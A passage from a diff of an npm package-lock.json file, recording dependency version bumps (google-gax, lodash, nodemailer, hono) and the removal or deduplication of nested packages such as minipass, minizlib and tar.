">= 6" } }, - "node_modules/glob/node_modules/brace-expansion": { - "version": "2.0.3", - "resolved": "https://registry.npmjs.org/brace-expansion/-/brace-expansion-2.0.3.tgz", - "integrity": "sha512-MCV/fYJEbqx68aE58kv2cA/kiky1G8vux3OR6/jbS+jIMe/6fJWa0DTzJU7dqijOWYwHi1t29FlfYI9uytqlpA==", - "license": "MIT", - "dependencies": { - "balanced-match": "^1.0.0" - } - }, "node_modules/glob/node_modules/minimatch": { "version": "9.0.9", "resolved": "https://registry.npmjs.org/minimatch/-/minimatch-9.0.9.tgz", @@ -17529,15 +17386,6 @@ "url": "https://github.com/sponsors/isaacs" } }, - "node_modules/glob/node_modules/minipass": { - "version": "7.1.2", - "resolved": "https://registry.npmjs.org/minipass/-/minipass-7.1.2.tgz", - "integrity": 
"sha512-qOOzS1cBTWYF4BH8fVePDBOO9iptMnGUEZwNc/cMWnTV2nVLZ7VoNWEPHkYczZA0pdoA7dl6e7FL659nX9S2aw==", - "license": "ISC", - "engines": { - "node": ">=16 || 14 >=14.17" - } - }, "node_modules/globals": { "version": "13.23.0", "resolved": "https://registry.npmjs.org/globals/-/globals-13.23.0.tgz", @@ -17617,54 +17465,136 @@ } }, "node_modules/google-gax": { - "version": "4.4.1", - "resolved": "https://registry.npmjs.org/google-gax/-/google-gax-4.4.1.tgz", - "integrity": "sha512-Phyp9fMfA00J3sZbJxbbB4jC55b7DBjE3F6poyL3wKMEBVKA79q6BGuHcTiM28yOzVql0NDbRL8MLLh8Iwk9Dg==", + "version": "5.0.6", + "resolved": "https://registry.npmjs.org/google-gax/-/google-gax-5.0.6.tgz", + "integrity": "sha512-1kGbqVQBZPAAu4+/R1XxPQKP0ydbNYoLAr4l0ZO2bMV0kLyLW4I1gAk++qBLWt7DPORTzmWRMsCZe86gDjShJA==", "license": "Apache-2.0", "dependencies": { - "@grpc/grpc-js": "^1.10.9", - "@grpc/proto-loader": "^0.7.13", - "@types/long": "^4.0.0", - "abort-controller": "^3.0.0", - "duplexify": "^4.0.0", - "google-auth-library": "^9.3.0", - "node-fetch": "^2.7.0", + "@grpc/grpc-js": "^1.12.6", + "@grpc/proto-loader": "^0.8.0", + "duplexify": "^4.1.3", + "google-auth-library": "^10.1.0", + "google-logging-utils": "^1.1.1", + "node-fetch": "^3.3.2", "object-hash": "^3.0.0", - "proto3-json-serializer": "^2.0.2", - "protobufjs": "^7.3.2", - "retry-request": "^7.0.0", - "uuid": "^9.0.1" + "proto3-json-serializer": "^3.0.0", + "protobufjs": "^7.5.3", + "retry-request": "^8.0.0", + "rimraf": "^5.0.1" }, "engines": { - "node": ">=14" + "node": ">=18" } }, - "node_modules/google-gax/node_modules/@types/long": { - "version": "4.0.2", - "resolved": "https://registry.npmjs.org/@types/long/-/long-4.0.2.tgz", - "integrity": "sha512-MqTGEo5bj5t157U6fA/BiDynNkn0YknVdh48CMPkTSpFTVmvao5UQmm7uEF6xBEo7qIMAlY/JSleYaE6VOdpaA==", - "license": "MIT" - }, - "node_modules/google-gax/node_modules/object-hash": { - "version": "3.0.0", - "resolved": "https://registry.npmjs.org/object-hash/-/object-hash-3.0.0.tgz", - "integrity": 
"sha512-RSn9F68PjH9HqtltsSnqYC1XXoWe9Bju5+213R98cNGttag9q9yAOTzdbsqvIa7aNm5WffBZFpWYr2aWrklWAw==", + "node_modules/google-gax/node_modules/agent-base": { + "version": "7.1.4", + "resolved": "https://registry.npmjs.org/agent-base/-/agent-base-7.1.4.tgz", + "integrity": "sha512-MnA+YT8fwfJPgBx3m60MNqakm30XOkyIoH1y6huTQvC0PwZG7ki8NacLBcrPbNoo8vEZy7Jpuk7+jMO+CUovTQ==", "license": "MIT", "engines": { - "node": ">= 6" + "node": ">= 14" } }, - "node_modules/google-gax/node_modules/uuid": { - "version": "9.0.1", - "resolved": "https://registry.npmjs.org/uuid/-/uuid-9.0.1.tgz", - "integrity": "sha512-b+1eJOlsR9K8HJpow9Ok3fiWOWSIcIzXodvv0rQjVoOVNpWMpxf1wZNpt4y9h10odCNrqnYp1OBzRktckBe3sA==", - "funding": [ - "https://github.com/sponsors/broofa", - "https://github.com/sponsors/ctavan" - ], - "license": "MIT", - "bin": { - "uuid": "dist/bin/uuid" + "node_modules/google-gax/node_modules/debug": { + "version": "4.4.3", + "resolved": "https://registry.npmjs.org/debug/-/debug-4.4.3.tgz", + "integrity": "sha512-RGwwWnwQvkVfavKVt22FGLw+xYSdzARwm0ru6DhTVA3umU5hZc28V3kO4stgYryrTlLpuvgI9GiijltAjNbcqA==", + "license": "MIT", + "dependencies": { + "ms": "^2.1.3" + }, + "engines": { + "node": ">=6.0" + }, + "peerDependenciesMeta": { + "supports-color": { + "optional": true + } + } + }, + "node_modules/google-gax/node_modules/gaxios": { + "version": "7.1.4", + "resolved": "https://registry.npmjs.org/gaxios/-/gaxios-7.1.4.tgz", + "integrity": "sha512-bTIgTsM2bWn3XklZISBTQX7ZSddGW+IO3bMdGaemHZ3tbqExMENHLx6kKZ/KlejgrMtj8q7wBItt51yegqalrA==", + "license": "Apache-2.0", + "dependencies": { + "extend": "^3.0.2", + "https-proxy-agent": "^7.0.1", + "node-fetch": "^3.3.2" + }, + "engines": { + "node": ">=18" + } + }, + "node_modules/google-gax/node_modules/gcp-metadata": { + "version": "8.1.2", + "resolved": "https://registry.npmjs.org/gcp-metadata/-/gcp-metadata-8.1.2.tgz", + "integrity": "sha512-zV/5HKTfCeKWnxG0Dmrw51hEWFGfcF2xiXqcA3+J90WDuP0SvoiSO5ORvcBsifmx/FoIjgQN3oNOGaQ5PhLFkg==", + "license": 
"Apache-2.0", + "dependencies": { + "gaxios": "^7.0.0", + "google-logging-utils": "^1.0.0", + "json-bigint": "^1.0.0" + }, + "engines": { + "node": ">=18" + } + }, + "node_modules/google-gax/node_modules/google-auth-library": { + "version": "10.6.2", + "resolved": "https://registry.npmjs.org/google-auth-library/-/google-auth-library-10.6.2.tgz", + "integrity": "sha512-e27Z6EThmVNNvtYASwQxose/G57rkRuaRbQyxM2bvYLLX/GqWZ5chWq2EBoUchJbCc57eC9ArzO5wMsEmWftCw==", + "license": "Apache-2.0", + "dependencies": { + "base64-js": "^1.3.0", + "ecdsa-sig-formatter": "^1.0.11", + "gaxios": "^7.1.4", + "gcp-metadata": "8.1.2", + "google-logging-utils": "1.1.3", + "jws": "^4.0.0" + }, + "engines": { + "node": ">=18" + } + }, + "node_modules/google-gax/node_modules/https-proxy-agent": { + "version": "7.0.6", + "resolved": "https://registry.npmjs.org/https-proxy-agent/-/https-proxy-agent-7.0.6.tgz", + "integrity": "sha512-vK9P5/iUfdl95AI+JVyUuIcVtd4ofvtrOr3HNtM2yxC9bnMbEdp3x01OhQNnjb8IJYi38VlTE3mBXwcfvywuSw==", + "license": "MIT", + "dependencies": { + "agent-base": "^7.1.2", + "debug": "4" + }, + "engines": { + "node": ">= 14" + } + }, + "node_modules/google-gax/node_modules/node-fetch": { + "version": "3.3.2", + "resolved": "https://registry.npmjs.org/node-fetch/-/node-fetch-3.3.2.tgz", + "integrity": "sha512-dRB78srN/l6gqWulah9SrxeYnxeddIG30+GOqK/9OlLVyLg3HPnr6SqOWTWOXKRwC2eGYCkZ59NNuSgvSrpgOA==", + "license": "MIT", + "dependencies": { + "data-uri-to-buffer": "^4.0.0", + "fetch-blob": "^3.1.4", + "formdata-polyfill": "^4.0.10" + }, + "engines": { + "node": "^12.20.0 || ^14.13.1 || >=16.0.0" + }, + "funding": { + "type": "opencollective", + "url": "https://opencollective.com/node-fetch" + } + }, + "node_modules/google-gax/node_modules/object-hash": { + "version": "3.0.0", + "resolved": "https://registry.npmjs.org/object-hash/-/object-hash-3.0.0.tgz", + "integrity": "sha512-RSn9F68PjH9HqtltsSnqYC1XXoWe9Bju5+213R98cNGttag9q9yAOTzdbsqvIa7aNm5WffBZFpWYr2aWrklWAw==", + "license": 
"MIT", + "engines": { + "node": ">= 6" } }, "node_modules/google-logging-utils": { @@ -17906,9 +17836,9 @@ } }, "node_modules/hono": { - "version": "4.12.9", - "resolved": "https://registry.npmjs.org/hono/-/hono-4.12.9.tgz", - "integrity": "sha512-wy3T8Zm2bsEvxKZM5w21VdHDDcwVS1yUFFY6i8UobSsKfFceT7TOwhbhfKsDyx7tYQlmRM5FLpIuYvNFyjctiA==", + "version": "4.12.12", + "resolved": "https://registry.npmjs.org/hono/-/hono-4.12.12.tgz", + "integrity": "sha512-p1JfQMKaceuCbpJKAPKVqyqviZdS0eUxH9v82oWo1kb9xjQ5wA6iP3FNVAPDFlz5/p7d45lO+BpSk1tuSZMF4Q==", "license": "MIT", "engines": { "node": ">=16.9.0" @@ -18303,22 +18233,6 @@ "node": ">= 0.10" } }, - "node_modules/is-arguments": { - "version": "1.2.0", - "resolved": "https://registry.npmjs.org/is-arguments/-/is-arguments-1.2.0.tgz", - "integrity": "sha512-7bVbi0huj/wrIAOzb8U1aszg9kdi3KN/CyU19CTI7tAoZYEZoL9yCDXpbXN+uPsuWnP02cyug1gleqq+TU+YCA==", - "license": "MIT", - "dependencies": { - "call-bound": "^1.0.2", - "has-tostringtag": "^1.0.2" - }, - "engines": { - "node": ">= 0.4" - }, - "funding": { - "url": "https://github.com/sponsors/ljharb" - } - }, "node_modules/is-array-buffer": { "version": "3.0.2", "resolved": "https://registry.npmjs.org/is-array-buffer/-/is-array-buffer-3.0.2.tgz", @@ -18452,25 +18366,6 @@ "node": ">=8" } }, - "node_modules/is-generator-function": { - "version": "1.1.2", - "resolved": "https://registry.npmjs.org/is-generator-function/-/is-generator-function-1.1.2.tgz", - "integrity": "sha512-upqt1SkGkODW9tsGNG5mtXTXtECizwtS2kA161M+gJPc1xdb/Ax629af6YrTwcOeQHbewrPNlE5Dx7kzvXTizA==", - "license": "MIT", - "dependencies": { - "call-bound": "^1.0.4", - "generator-function": "^2.0.0", - "get-proto": "^1.0.1", - "has-tostringtag": "^1.0.2", - "safe-regex-test": "^1.1.0" - }, - "engines": { - "node": ">= 0.4" - }, - "funding": { - "url": "https://github.com/sponsors/ljharb" - } - }, "node_modules/is-glob": { "version": "4.0.3", "resolved": "https://registry.npmjs.org/is-glob/-/is-glob-4.0.3.tgz", @@ -18600,6 
+18495,7 @@ "version": "1.2.1", "resolved": "https://registry.npmjs.org/is-regex/-/is-regex-1.2.1.tgz", "integrity": "sha512-MjYsKHO5O7mCsmRGxWcLWheFqN9DJ/2TmngvjKXihe6efViPqc274+Fx/4fYj/r03+ESvBdTXK0V6tA3rgez1g==", + "dev": true, "license": "MIT", "dependencies": { "call-bound": "^1.0.2", @@ -18694,18 +18590,6 @@ "url": "https://github.com/sponsors/ljharb" } }, - "node_modules/is-unicode-supported": { - "version": "1.3.0", - "resolved": "https://registry.npmjs.org/is-unicode-supported/-/is-unicode-supported-1.3.0.tgz", - "integrity": "sha512-43r2mRvz+8JRIKnWJ+3j8JtjRKZ6GmjzfaE/qiBJnikNnYv/6bagRJ1kUhNk8R5EX/GkobD+r+sfxCPJsiKBLQ==", - "dev": true, - "engines": { - "node": ">=12" - }, - "funding": { - "url": "https://github.com/sponsors/sindresorhus" - } - }, "node_modules/is-weakref": { "version": "1.0.2", "resolved": "https://registry.npmjs.org/is-weakref/-/is-weakref-1.0.2.tgz", @@ -18805,14 +18689,6 @@ "jiti": "lib/jiti-cli.mjs" } }, - "node_modules/jmespath": { - "version": "0.16.0", - "resolved": "https://registry.npmjs.org/jmespath/-/jmespath-0.16.0.tgz", - "integrity": "sha512-9FzQjJ7MATs1tSpnco1K6ayiYE3figslrXA72G2HQ/n76RzvYlofyi5QM+iX4YRs/pu3yzxlVQSST23+dMDknw==", - "engines": { - "node": ">= 0.6.0" - } - }, "node_modules/jose": { "version": "6.1.3", "resolved": "https://registry.npmjs.org/jose/-/jose-6.1.3.tgz", @@ -19572,9 +19448,9 @@ } }, "node_modules/lodash": { - "version": "4.17.23", - "resolved": "https://registry.npmjs.org/lodash/-/lodash-4.17.23.tgz", - "integrity": "sha512-LgVTMpQtIopCi79SJeDiP0TfWi5CNEc/L/aRdTh3yIvmZXTnheWpKjSZhnvMl8iXbC1tFg9gdHHDMLoV7CnG+w==", + "version": "4.18.1", + "resolved": "https://registry.npmjs.org/lodash/-/lodash-4.18.1.tgz", + "integrity": "sha512-dMInicTPVE8d1e5otfwmmjlxkZoUpiVLwyeTdUsi/Caj/gfzzblBcCE5sRHV/AsjuCmxWrte2TNGSYuCeCq+0Q==", "license": "MIT" }, "node_modules/lodash.camelcase": { @@ -19659,22 +19535,6 @@ "resolved": "https://registry.npmjs.org/lodash.sortby/-/lodash.sortby-4.7.0.tgz", "integrity": 
"sha512-HDWXG8isMntAyRF5vZ7xKuEvOhT4AhlRt/3czTSjvGUxjYCBVRQY48ViDHyfYz9VIoBkW4TMGQNapx+l3RUwdA==" }, - "node_modules/log-symbols": { - "version": "5.1.0", - "resolved": "https://registry.npmjs.org/log-symbols/-/log-symbols-5.1.0.tgz", - "integrity": "sha512-l0x2DvrW294C9uDCoQe1VSU4gf529FkSZ6leBl4TiqZH/e+0R7hSfHQBNut2mNygDgHwvYHfFLn6Oxb3VWj2rA==", - "dev": true, - "dependencies": { - "chalk": "^5.0.0", - "is-unicode-supported": "^1.1.0" - }, - "engines": { - "node": ">=12" - }, - "funding": { - "url": "https://github.com/sponsors/sindresorhus" - } - }, "node_modules/logform": { "version": "2.6.1", "resolved": "https://registry.npmjs.org/logform/-/logform-2.6.1.tgz", @@ -19793,15 +19653,6 @@ "node": "^20.17.0 || >=22.9.0" } }, - "node_modules/make-fetch-happen/node_modules/minipass": { - "version": "7.1.3", - "resolved": "https://registry.npmjs.org/minipass/-/minipass-7.1.3.tgz", - "integrity": "sha512-tEBHqDnIoM/1rXME1zgka9g6Q2lcoCkxHLuc7ODJ5BxbP5d4c2Z5cGgtXAku59200Cx7diuHTOYfSBD8n6mm8A==", - "license": "BlueOak-1.0.0", - "engines": { - "node": ">=16 || 14 >=14.17" - } - }, "node_modules/make-fetch-happen/node_modules/negotiator": { "version": "1.0.0", "resolved": "https://registry.npmjs.org/negotiator/-/negotiator-1.0.0.tgz", @@ -19938,15 +19789,6 @@ "node": ">= 0.6" } }, - "node_modules/mimic-fn": { - "version": "2.1.0", - "resolved": "https://registry.npmjs.org/mimic-fn/-/mimic-fn-2.1.0.tgz", - "integrity": "sha512-OqbOk5oEQeAZ8WXWydlu9HJjz9WVdEIvamMCcXmuqUYjTknH/sqsWvhQ3vgwKFRR1HpjvNBKQ37nbJgYzGqGcg==", - "dev": true, - "engines": { - "node": ">=6" - } - }, "node_modules/mimic-function": { "version": "5.0.1", "resolved": "https://registry.npmjs.org/mimic-function/-/mimic-function-5.0.1.tgz", @@ -19979,6 +19821,17 @@ "node": "*" } }, + "node_modules/minimatch/node_modules/brace-expansion": { + "version": "1.1.13", + "resolved": "https://registry.npmjs.org/brace-expansion/-/brace-expansion-1.1.13.tgz", + "integrity": 
"sha512-9ZLprWS6EENmhEOpjCYW2c8VkmOvckIJZfkr7rBW6dObmfgJ/L1GpSYW5Hpo9lDz4D1+n0Ckz8rU7FwHDQiG/w==", + "dev": true, + "license": "MIT", + "dependencies": { + "balanced-match": "^1.0.0", + "concat-map": "0.0.1" + } + }, "node_modules/minimist": { "version": "1.2.8", "resolved": "https://registry.npmjs.org/minimist/-/minimist-1.2.8.tgz", @@ -19988,11 +19841,12 @@ } }, "node_modules/minipass": { - "version": "5.0.0", - "resolved": "https://registry.npmjs.org/minipass/-/minipass-5.0.0.tgz", - "integrity": "sha512-3FnjYuehv9k6ovOEbyOswadCDPX1piCfhV8ncmYtHOjuPwylVWsghTLo7rabjC3Rx5xD4HDx8Wm1xnMF7S5qFQ==", + "version": "7.1.3", + "resolved": "https://registry.npmjs.org/minipass/-/minipass-7.1.3.tgz", + "integrity": "sha512-tEBHqDnIoM/1rXME1zgka9g6Q2lcoCkxHLuc7ODJ5BxbP5d4c2Z5cGgtXAku59200Cx7diuHTOYfSBD8n6mm8A==", + "license": "BlueOak-1.0.0", "engines": { - "node": ">=8" + "node": ">=16 || 14 >=14.17" } }, "node_modules/minipass-collect": { @@ -20007,15 +19861,6 @@ "node": ">=16 || 14 >=14.17" } }, - "node_modules/minipass-collect/node_modules/minipass": { - "version": "7.1.3", - "resolved": "https://registry.npmjs.org/minipass/-/minipass-7.1.3.tgz", - "integrity": "sha512-tEBHqDnIoM/1rXME1zgka9g6Q2lcoCkxHLuc7ODJ5BxbP5d4c2Z5cGgtXAku59200Cx7diuHTOYfSBD8n6mm8A==", - "license": "BlueOak-1.0.0", - "engines": { - "node": ">=16 || 14 >=14.17" - } - }, "node_modules/minipass-fetch": { "version": "5.0.2", "resolved": "https://registry.npmjs.org/minipass-fetch/-/minipass-fetch-5.0.2.tgz", @@ -20050,27 +19895,6 @@ "url": "https://opencollective.com/express" } }, - "node_modules/minipass-fetch/node_modules/minipass": { - "version": "7.1.3", - "resolved": "https://registry.npmjs.org/minipass/-/minipass-7.1.3.tgz", - "integrity": "sha512-tEBHqDnIoM/1rXME1zgka9g6Q2lcoCkxHLuc7ODJ5BxbP5d4c2Z5cGgtXAku59200Cx7diuHTOYfSBD8n6mm8A==", - "license": "BlueOak-1.0.0", - "engines": { - "node": ">=16 || 14 >=14.17" - } - }, - "node_modules/minipass-fetch/node_modules/minizlib": { - "version": "3.1.0", 
- "resolved": "https://registry.npmjs.org/minizlib/-/minizlib-3.1.0.tgz", - "integrity": "sha512-KZxYo1BUkWD2TVFLr0MQoM8vUUigWD3LlD83a/75BqC+4qE0Hb1Vo5v1FgcfaNXvfXzr+5EhQ6ing/CaBijTlw==", - "license": "MIT", - "dependencies": { - "minipass": "^7.1.2" - }, - "engines": { - "node": ">= 18" - } - }, "node_modules/minipass-flush": { "version": "1.0.7", "resolved": "https://registry.npmjs.org/minipass-flush/-/minipass-flush-1.0.7.tgz", @@ -20131,47 +19955,16 @@ "node": ">=8" } }, - "node_modules/minipass-sized/node_modules/minipass": { - "version": "7.1.3", - "resolved": "https://registry.npmjs.org/minipass/-/minipass-7.1.3.tgz", - "integrity": "sha512-tEBHqDnIoM/1rXME1zgka9g6Q2lcoCkxHLuc7ODJ5BxbP5d4c2Z5cGgtXAku59200Cx7diuHTOYfSBD8n6mm8A==", - "license": "BlueOak-1.0.0", - "engines": { - "node": ">=16 || 14 >=14.17" - } - }, "node_modules/minizlib": { - "version": "2.1.2", - "resolved": "https://registry.npmjs.org/minizlib/-/minizlib-2.1.2.tgz", - "integrity": "sha512-bAxsR8BVfj60DWXHE3u30oHzfl4G7khkSuPW+qvpd7jFRHm7dLxOjUk1EHACJ/hxLY8phGJ0YhYHZo7jil7Qdg==", - "dependencies": { - "minipass": "^3.0.0", - "yallist": "^4.0.0" - }, - "engines": { - "node": ">= 8" - } - }, - "node_modules/minizlib/node_modules/minipass": { - "version": "3.3.6", - "resolved": "https://registry.npmjs.org/minipass/-/minipass-3.3.6.tgz", - "integrity": "sha512-DxiNidxSEK+tHG6zOIklvNOwm3hvCrbUrdtzY74U6HKTJxvIDfOUL5W5P2Ghd3DTkhhKPYGqeNUIh5qcM4YBfw==", + "version": "3.1.0", + "resolved": "https://registry.npmjs.org/minizlib/-/minizlib-3.1.0.tgz", + "integrity": "sha512-KZxYo1BUkWD2TVFLr0MQoM8vUUigWD3LlD83a/75BqC+4qE0Hb1Vo5v1FgcfaNXvfXzr+5EhQ6ing/CaBijTlw==", + "license": "MIT", "dependencies": { - "yallist": "^4.0.0" - }, - "engines": { - "node": ">=8" - } - }, - "node_modules/mkdirp": { - "version": "1.0.4", - "resolved": "https://registry.npmjs.org/mkdirp/-/mkdirp-1.0.4.tgz", - "integrity": "sha512-vVqVZQyf3WLx2Shd0qJ9xuvqgAyKPLAiqITEtqW0oIUjzo3PePDd6fW9iFz30ef7Ysp/oiWqbhszeGWW2T6Gzw==", - "bin": 
{ - "mkdirp": "bin/cmd.js" + "minipass": "^7.1.2" }, "engines": { - "node": ">=10" + "node": ">= 18" } }, "node_modules/mlly": { @@ -20692,15 +20485,6 @@ "node": "^20.17.0 || >=22.9.0" } }, - "node_modules/node-gyp/node_modules/chownr": { - "version": "3.0.0", - "resolved": "https://registry.npmjs.org/chownr/-/chownr-3.0.0.tgz", - "integrity": "sha512-+IxzY9BZOQd/XuYPRmrvEVjF/nqj5kgT4kEq7VofrDoM1MxoRjEWkrCC3EtLi59TVawxTAn+orJwFQcrqEN1+g==", - "license": "BlueOak-1.0.0", - "engines": { - "node": ">=18" - } - }, "node_modules/node-gyp/node_modules/isexe": { "version": "4.0.0", "resolved": "https://registry.npmjs.org/isexe/-/isexe-4.0.0.tgz", @@ -20710,56 +20494,19 @@ "node": ">=20" } }, - "node_modules/node-gyp/node_modules/minipass": { - "version": "7.1.3", - "resolved": "https://registry.npmjs.org/minipass/-/minipass-7.1.3.tgz", - "integrity": "sha512-tEBHqDnIoM/1rXME1zgka9g6Q2lcoCkxHLuc7ODJ5BxbP5d4c2Z5cGgtXAku59200Cx7diuHTOYfSBD8n6mm8A==", - "license": "BlueOak-1.0.0", + "node_modules/node-gyp/node_modules/nopt": { + "version": "9.0.0", + "resolved": "https://registry.npmjs.org/nopt/-/nopt-9.0.0.tgz", + "integrity": "sha512-Zhq3a+yFKrYwSBluL4H9XP3m3y5uvQkB/09CwDruCiRmR/UJYnn9W4R48ry0uGC70aeTPKLynBtscP9efFFcPw==", + "license": "ISC", + "dependencies": { + "abbrev": "^4.0.0" + }, + "bin": { + "nopt": "bin/nopt.js" + }, "engines": { - "node": ">=16 || 14 >=14.17" - } - }, - "node_modules/node-gyp/node_modules/minizlib": { - "version": "3.1.0", - "resolved": "https://registry.npmjs.org/minizlib/-/minizlib-3.1.0.tgz", - "integrity": "sha512-KZxYo1BUkWD2TVFLr0MQoM8vUUigWD3LlD83a/75BqC+4qE0Hb1Vo5v1FgcfaNXvfXzr+5EhQ6ing/CaBijTlw==", - "license": "MIT", - "dependencies": { - "minipass": "^7.1.2" - }, - "engines": { - "node": ">= 18" - } - }, - "node_modules/node-gyp/node_modules/nopt": { - "version": "9.0.0", - "resolved": "https://registry.npmjs.org/nopt/-/nopt-9.0.0.tgz", - "integrity": 
"sha512-Zhq3a+yFKrYwSBluL4H9XP3m3y5uvQkB/09CwDruCiRmR/UJYnn9W4R48ry0uGC70aeTPKLynBtscP9efFFcPw==", - "license": "ISC", - "dependencies": { - "abbrev": "^4.0.0" - }, - "bin": { - "nopt": "bin/nopt.js" - }, - "engines": { - "node": "^20.17.0 || >=22.9.0" - } - }, - "node_modules/node-gyp/node_modules/tar": { - "version": "7.5.13", - "resolved": "https://registry.npmjs.org/tar/-/tar-7.5.13.tgz", - "integrity": "sha512-tOG/7GyXpFevhXVh8jOPJrmtRpOTsYqUIkVdVooZYJS/z8WhfQUX8RJILmeuJNinGAMSu1veBr4asSHFt5/hng==", - "license": "BlueOak-1.0.0", - "dependencies": { - "@isaacs/fs-minipass": "^4.0.0", - "chownr": "^3.0.0", - "minipass": "^7.1.2", - "minizlib": "^3.1.0", - "yallist": "^5.0.0" - }, - "engines": { - "node": ">=18" + "node": "^20.17.0 || >=22.9.0" } }, "node_modules/node-gyp/node_modules/which": { @@ -20777,15 +20524,6 @@ "node": "^20.17.0 || >=22.9.0" } }, - "node_modules/node-gyp/node_modules/yallist": { - "version": "5.0.0", - "resolved": "https://registry.npmjs.org/yallist/-/yallist-5.0.0.tgz", - "integrity": "sha512-YgvUTfwqyc7UXVMrB+SImsVYSmTS8X/tSrtdNZMImM+n7+QTriRXyXim0mBrTXNeqzVF0KWGgHPeiyViFFrNDw==", - "license": "BlueOak-1.0.0", - "engines": { - "node": ">=18" - } - }, "node_modules/node-releases": { "version": "2.0.23", "resolved": "https://registry.npmjs.org/node-releases/-/node-releases-2.0.23.tgz", @@ -20794,9 +20532,9 @@ "license": "MIT" }, "node_modules/nodemailer": { - "version": "7.0.13", - "resolved": "https://registry.npmjs.org/nodemailer/-/nodemailer-7.0.13.tgz", - "integrity": "sha512-PNDFSJdP+KFgdsG3ZzMXCgquO7I6McjY2vlqILjtJd0hy8wEvtugS9xKRF2NWlPNGxvLCXlTNIae4serI7dinw==", + "version": "8.0.5", + "resolved": "https://registry.npmjs.org/nodemailer/-/nodemailer-8.0.5.tgz", + "integrity": "sha512-0PF8Yb1yZuQfQbq+5/pZJrtF6WQcjTd5/S4JOHs9PGFxuTqoB/icwuB44pOdURHJbRKX1PPoJZtY7R4VUoCC8w==", "license": "MIT-0", "engines": { "node": ">=6.0.0" @@ -21322,6 +21060,35 @@ "resolved": 
"https://registry.npmjs.org/@octokit/openapi-types/-/openapi-types-22.2.0.tgz", "integrity": "sha512-QBhVjcUa9W7Wwhm6DBFu6ZZ+1/t/oYxqc2tp81Pi41YNuJinbFRx8B133qVOrAaBbF7D/m0Et6f9/pZt9Rc+tg==" }, + "node_modules/octokit-auth-probot/node_modules/@octokit/request-error": { + "version": "5.1.1", + "resolved": "https://registry.npmjs.org/@octokit/request-error/-/request-error-5.1.1.tgz", + "integrity": "sha512-v9iyEQJH6ZntoENr9/yXxjuezh4My67CBSu9r6Ve/05Iu5gNgnisNWOsoJHTP6k0Rr0+HQIpnH+kyammu90q/g==", + "license": "MIT", + "dependencies": { + "@octokit/types": "^13.1.0", + "deprecation": "^2.0.0", + "once": "^1.4.0" + }, + "engines": { + "node": ">= 18" + } + }, + "node_modules/octokit-auth-probot/node_modules/@octokit/request-error/node_modules/@octokit/openapi-types": { + "version": "24.2.0", + "resolved": "https://registry.npmjs.org/@octokit/openapi-types/-/openapi-types-24.2.0.tgz", + "integrity": "sha512-9sIH3nSUttelJSXUrmGzl7QUBFul0/mB8HRYl3fOlgHbIWG+WnYDXU3v/2zMtAvuzZ/ed00Ei6on975FhBfzrg==", + "license": "MIT" + }, + "node_modules/octokit-auth-probot/node_modules/@octokit/request-error/node_modules/@octokit/types": { + "version": "13.10.0", + "resolved": "https://registry.npmjs.org/@octokit/types/-/types-13.10.0.tgz", + "integrity": "sha512-ifLaO34EbbPj0Xgro4G5lP5asESjwHracYJvVaPIyXMuiuXLlhic3S47cBdTb+jfODkTE5YtGCLt3Ay3+J97sA==", + "license": "MIT", + "dependencies": { + "@octokit/openapi-types": "^24.2.0" + } + }, "node_modules/octokit-auth-probot/node_modules/lru-cache": { "version": "10.4.3", "resolved": "https://registry.npmjs.org/lru-cache/-/lru-cache-10.4.3.tgz", @@ -21418,21 +21185,6 @@ "fn.name": "1.x.x" } }, - "node_modules/onetime": { - "version": "5.1.2", - "resolved": "https://registry.npmjs.org/onetime/-/onetime-5.1.2.tgz", - "integrity": "sha512-kbpaSSGJTWdAY5KPVeMOKXSrPtr8C8C7wodJbcsd51jRnmD+GZu8Y0VoU6Dm5Z4vWr0Ig/1NKuWRKf7j5aaYSg==", - "dev": true, - "dependencies": { - "mimic-fn": "^2.1.0" - }, - "engines": { - "node": ">=6" - }, - "funding": { - 
"url": "https://github.com/sponsors/sindresorhus" - } - }, "node_modules/open": { "version": "10.1.1", "resolved": "https://registry.npmjs.org/open/-/open-10.1.1.tgz", @@ -21534,29 +21286,6 @@ "node": ">= 0.8.0" } }, - "node_modules/ora": { - "version": "7.0.1", - "resolved": "https://registry.npmjs.org/ora/-/ora-7.0.1.tgz", - "integrity": "sha512-0TUxTiFJWv+JnjWm4o9yvuskpEJLXTcng8MJuKd+SzAzp2o+OP3HWqNhB4OdJRt1Vsd9/mR0oyaEYlOnL7XIRw==", - "dev": true, - "dependencies": { - "chalk": "^5.3.0", - "cli-cursor": "^4.0.0", - "cli-spinners": "^2.9.0", - "is-interactive": "^2.0.0", - "is-unicode-supported": "^1.3.0", - "log-symbols": "^5.1.0", - "stdin-discarder": "^0.1.0", - "string-width": "^6.1.0", - "strip-ansi": "^7.1.0" - }, - "engines": { - "node": ">=16" - }, - "funding": { - "url": "https://github.com/sponsors/sindresorhus" - } - }, "node_modules/oracledb": { "version": "6.4.0", "resolved": "https://registry.npmjs.org/oracledb/-/oracledb-6.4.0.tgz", @@ -21669,17 +21398,6 @@ "node": ">=8" } }, - "node_modules/p-throttle": { - "version": "5.1.0", - "resolved": "https://registry.npmjs.org/p-throttle/-/p-throttle-5.1.0.tgz", - "integrity": "sha512-+N+s2g01w1Zch4D0K3OpnPDqLOKmLcQ4BvIFq3JC0K29R28vUOjWpO+OJZBNt8X9i3pFCksZJZ0YXkUGjaFE6g==", - "engines": { - "node": "^12.20.0 || ^14.13.1 || >=16.0.0" - }, - "funding": { - "url": "https://github.com/sponsors/sindresorhus" - } - }, "node_modules/p-timeout": { "version": "3.2.0", "resolved": "https://registry.npmjs.org/p-timeout/-/p-timeout-3.2.0.tgz", @@ -21861,9 +21579,9 @@ } }, "node_modules/path-expression-matcher": { - "version": "1.2.0", - "resolved": "https://registry.npmjs.org/path-expression-matcher/-/path-expression-matcher-1.2.0.tgz", - "integrity": "sha512-DwmPWeFn+tq7TiyJ2CxezCAirXjFxvaiD03npak3cRjlP9+OjTmSy1EpIrEbh+l6JgUundniloMLDQ/6VTdhLQ==", + "version": "1.5.0", + "resolved": "https://registry.npmjs.org/path-expression-matcher/-/path-expression-matcher-1.5.0.tgz", + "integrity": 
